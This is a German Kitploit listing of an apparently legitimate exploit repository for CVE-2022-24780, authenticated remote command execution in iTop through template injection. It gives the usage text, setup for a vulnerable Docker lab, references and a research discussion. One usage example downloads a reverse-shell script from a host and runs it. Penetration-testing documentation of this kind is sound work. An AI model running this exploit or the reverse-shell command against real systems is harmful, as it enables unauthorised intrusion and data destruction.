Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-CVE-2022-24780 — iTop < 2.7.6 - (Authentifizierte) Remote-Befehlsausführung | Kitploit
Tools/GitHubGitHub/acceis/exploit-cve-2022-24780
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubacceis/exploit-cve-2022-24780

exploit-CVE-2022-24780

iTop < 2.7.6 - (Authentifizierte) Remote-Befehlsausführung

Repository anzeigen
64vor 4 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

iTop RCE via SSTI - CVE-2022-24780 Exploit

iTop < 2.7.6 - (Authenticated) Remote-Befehlsausführung

Exploit für [CVE-2022-24780][CVE-2022-24780].

[EDB-TODO] [PacketStorm] [WLB-2022050075]

Verwendung

$ ruby exploit.rb -h
iTop < 2.7.6 - (Authenticated) Remote command execution

Usage:
  exploit.rb full <url> <username> <password> <cmd> [--debug]
  exploit.rb light <url> <username> <password> <cmd> [--debug]
  exploit.rb -h | --help

  full: exploit with an emulated browser, execute JavaScript, preserve original user profile information
  light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <username>  iTop portal username
  <password>  iTop portal user password
  <cmd>       Command to execute on the target
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'
  exploit.rb light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'

Varianten

Die vollständige Variante des Exploits verwendet Watir mit einem von Selenium gesteuerten Webbrowser, um einen Benutzer beim Surfen zu emulieren. Dies ist erforderlich, um Benutzerinformationen zu erhalten. Der Exploit injiziert eine SSTI-Nutzlast in einen Unterteil des Formulars, das zum Ändern von Benutzerinformationen im Portal-Benutzerprofil verwendet wird. Während einige Werte hartcodiert oder aus dem HTML abgerufen werden können, werden andere (Telefon, Standort, Funktion) dynamisch über Javascript geladen und in das HTML eingefügt. Damit der Exploit nicht destruktiv ist, muss JavaScript ausgeführt werden, um diese Werte abrufen zu können.

Die leichte Variante des Exploits ist weniger besorgt und setzt einfach zerstörerisch einen Nullwert für einige Benutzerinformationsfelder (Telefon, Standort, Funktion). Allerdings ist diese Variante schneller auszuführen, erfordert weniger Abhängigkeiten, führt kein JavaScript aus und benötigt keine X-Umgebung (Watir benötigt sie, um den Webbrowser auszuführen).

Anforderungen

TL;DR: Alles installieren mittels bundle install

Vollständige Variante

  • httpx
  • docopt.rb
  • watir
  • webdrivers

Beispiel mit gem:

gem install httpx docopt watir webdrivers

Leichte Variante

  • httpx
  • docopt.rb
  • Nokogiri

Beispiel mit gem:

gem install httpx docopt nokogiri

Einschränkungen

Es wird nicht empfohlen, Nutzlasten mit doppelten Anführungszeichen (") oder Backslashes (\) zu verwenden, da die Nutzlast in JSON injiziert wird.

Docker-Bereitstellung der verwundbaren Software

Warnung: Dieser Container ist nicht für den Produktionseinsatz geeignet!

Verwendung vbkunin/itop:2.7.4 - source - docker hub

$ docker run -d -p 8000:80 --name=itop-CVE-2022-24780 vbkunin/itop:2.7.4

Referenzen

  • Zielsoftware: iTop
    • Homepage: https://www.itophub.io/
    • Vendor: https://www.combodo.com/itop
    • Online demo: https://www.combodo.com/itop-access-to-the-demonstration
    • Quelle:
      • https://github.com/Combodo/iTop
      • https://sourceforge.net/projects/itop/files/itop/
    • Verwundbare Version:
      • 2.x branch: < 2.7.6
      • 3.x branch: < 3.0.0 (z.B. 3.0.0-beta-7312)
    • Patches:
      • https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b
      • https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305
      • https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3
    • Sicherheitshinweise:
      • https://www.opencve.io/cve/CVE-2022-24780
      • https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54
      • https://attackerkb.com/topics/tcUqij2rjR/cve-2022-24780

Die Verwundbarkeit wurde von Markus KRELL entdeckt.

Analyse der Verwundbarkeit durch den Entdecker:

  • iTop – Template Injection inside customer Portal

Haftungsausschluss

ACCEIS fördert oder ermutigt keine illegalen Aktivitäten, alle von diesem Repository bereitgestellten Inhalte dienen ausschließlich Forschungs-, Bildungs- und Bedrohungserkennungszwecken.

Forschung

Der Exploit

Als Sicherheitsauditor (oder jede andere White-Hat-Rolle) möchten Sie einerseits ein Exploit-Skript ausführen, um die praktische Ausnutzbarkeit der theoretischen Verwundbarkeit basierend auf der von Ihnen identifizierten Versionsnummer der Anwendung zu überprüfen, andererseits möchten Sie, dass dies ordnungsgemäß ohne zerstörerische Aktionen durchgeführt wird, damit die Kundenanwendung im gleichen Zustand bleibt, wie Sie sie vorgefunden haben.

Zum Beispiel tritt dieser Exploit auf der Benutzerprofilseite auf, es gibt also ein Formular mit bereits ausgefüllten Informationen des Benutzers: Vorname, Name, Organisations-ID, E-Mail, Telefon, Standort-ID, Funktion, Manager-ID. Damit der Angriff funktioniert, müssen Sie nur die verwundbaren Felder überschreiben und andere mit Nullwerten oder Zufallswerten füllen, falls sie erforderlich sind. Das macht die leichte Variante des Exploits. Aber dabei zerstören Sie die tatsächlichen Informationen für diesen Benutzer, was in einer Testumgebung kein Problem ist, aber in einer Produktionsumgebung ein echtes Problem darstellt. Ein Black Hat kümmert sich nicht darum, aber als White Hat müssen wir die Daten erhalten. Die Lösung besteht darin, die tatsächlichen Daten abzurufen und in unserer POST-Anfrage wiederzuverwenden.

Bei klassischen Webanwendungen müssen Sie oft nur eine POST-Anfrage mit den richtigen Parametern direkt an den verwundbaren Endpunkt richten. Manchmal müssen Sie Sitzungen/Cookies, Weiterleitungen, einige vorherige Zustände, die möglicherweise erforderlich sind, das Abrufen einer ID oder Anti-CSRF-Token handhaben, aber all das bleibt sehr einfach und kann mit so ziemlich jeder HTTP-Bibliothek in jeder Sprache erreicht werden.

Um die tatsächlichen Daten abzurufen, wenn die Daten im Formular stammen von:

  • der Serverantwort, müssen Sie nur die Seite scrapen und HTML parsen;
  • einer XHR, die an eine API gestellt wird und die Daten durch JavaScript im HTML ersetzt werden, benötigen Sie kein JavaScript, Sie können eine weitere POST-Anfrage an die API stellen, um die Daten selbst abzurufen.
Tool herunterladen